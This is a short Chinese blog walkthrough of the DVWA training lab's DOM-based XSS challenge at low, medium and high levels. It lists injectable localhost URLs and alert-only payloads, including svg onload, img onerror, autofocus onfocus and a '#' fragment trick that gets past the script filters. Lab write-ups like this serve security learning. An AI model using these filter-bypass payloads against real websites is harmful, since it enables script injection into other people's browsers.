【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦

一、低级low

拼接的url样式:​​​​​​​

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

<script>alert("假客套")</script>

二、中级middle

拼接的url样式:​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下四选一

</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

注意这里的autofocus会一直自动加载弹窗,不加无效

<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式:

​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下二选一

自定义一个参数名,拼接假的采纳数传递过去,比如不存在的name

&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端,也不过滤

#<script>alert("假客套")</script>
相关推荐
轨迹H10 小时前
kali设置中文输入法
linux·网络安全·渗透测试·kali
cr.sheeper10 小时前
Vulnhub靶场Apache解析漏洞
网络安全·apache
Autumn.h11 小时前
文件解析漏洞
web安全·网络安全·中间件
Mitch31113 小时前
【漏洞复现】CVE-2023-37461 Arbitrary File Writing
web安全·网络安全·prometheus·metersphere·漏洞复现
CVE-柠檬i13 小时前
渗透测试-前后端加密分析之RSA+AES
网络安全
TazmiDev18 小时前
[极客大挑战 2019]BabySQL 1
服务器·数据库·安全·web安全·网络安全·密码学·安全威胁分析
亚信安全官方账号1 天前
亚信安全与方天股份达成战略合作,双向奔赴助力数字化转型
网络安全
Koi慢热1 天前
黑客术语3
网络·安全·网络安全·智能路由器·空间安全·网络空间测绘安全
CVE-柠檬i1 天前
渗透测试-前端加密分析之RSA响应加密
网络安全